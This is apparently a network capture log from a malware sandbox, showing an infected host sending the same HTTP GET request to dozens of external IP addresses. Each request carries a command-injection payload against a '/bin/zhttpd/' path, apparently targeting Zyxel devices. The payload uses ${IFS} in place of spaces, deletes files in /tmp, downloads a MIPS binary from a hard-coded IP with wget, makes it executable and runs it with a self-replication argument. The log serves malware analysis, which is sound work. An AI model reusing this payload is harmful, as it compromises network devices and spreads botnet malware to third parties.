                                      Jan 14, 2024 15:50:49.370332003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5151192.168.2.1445260143.238.212.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370373011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5152192.168.2.1450614133.28.203.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370428085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5153192.168.2.145623674.80.23.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370482922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5154192.168.2.1450248201.65.201.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370532036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5155192.168.2.143935632.121.225.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370572090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5156192.168.2.1450358122.81.202.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370639086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5157192.168.2.144356013.80.117.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370668888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5158192.168.2.145957624.78.54.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370739937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5159192.168.2.1443010138.142.53.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370820999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5160192.168.2.144067847.100.74.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370874882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5161192.168.2.144482253.29.167.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370913982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5162192.168.2.1436966113.119.104.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370985031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5163192.168.2.1441342133.134.142.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371040106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5164192.168.2.1436396199.11.19.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371102095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5165192.168.2.143587065.229.56.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371145964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5166192.168.2.1438632208.223.183.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371200085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5167192.168.2.1450800113.161.25.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371262074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5168192.168.2.1449932208.127.246.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371289015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5169192.168.2.145463018.47.169.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371380091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5170192.168.2.144861684.29.197.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371419907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5171192.168.2.1446480133.76.210.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371498108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5172192.168.2.1455866193.204.159.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371582985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5173192.168.2.1440814117.24.114.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371629000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5174192.168.2.145304498.121.250.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371670008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5175192.168.2.1438768132.206.163.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371711016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5176192.168.2.1457852195.206.71.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371777058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5177192.168.2.1459420199.132.243.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371835947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5178192.168.2.14508924.96.233.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371875048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5179192.168.2.1447100178.39.179.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371922970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5180192.168.2.1449708189.244.120.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.371994019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5181192.168.2.1433858203.99.18.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372026920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5182192.168.2.1441620126.76.115.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372087955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5183192.168.2.1455950167.134.2.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372155905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5184192.168.2.1454286101.196.209.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372231960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5185192.168.2.145874469.169.38.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372265100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5186192.168.2.14377308.212.168.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372303963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5187192.168.2.144907073.116.221.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372360945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5188192.168.2.144794857.15.195.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372395039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5189192.168.2.1433974182.158.219.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372461081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5190192.168.2.1444768125.87.162.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372526884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5191192.168.2.14510844.151.65.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372605085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5192192.168.2.1454094142.17.44.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372646093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5193192.168.2.1436680129.8.83.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372683048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5194192.168.2.144390249.215.247.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372750998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5195192.168.2.144616077.203.20.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372771025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5196192.168.2.143907625.132.45.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372840881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5197192.168.2.1458412133.223.156.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372904062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5198192.168.2.143570662.133.200.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.372983932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5199192.168.2.1460608131.0.63.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373080969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5200192.168.2.1449744108.139.66.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373126030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5201192.168.2.1434668196.130.36.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373188019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5202192.168.2.144043872.18.215.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373193979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5203192.168.2.1433056156.110.203.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373262882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5204192.168.2.144105297.156.188.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373326063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5205192.168.2.144850299.56.96.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373394012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5206192.168.2.1457060170.124.79.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373447895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5207192.168.2.143561853.186.114.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373521090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5208192.168.2.1448836222.184.180.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373569012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5209192.168.2.1453642205.71.247.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373637915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5210192.168.2.144256288.70.77.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373676062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5211192.168.2.143476665.3.214.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373728991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5212192.168.2.144926678.217.12.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373785973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5213192.168.2.144985459.230.245.162443
                                      TimestampBytes transferredDirectionData
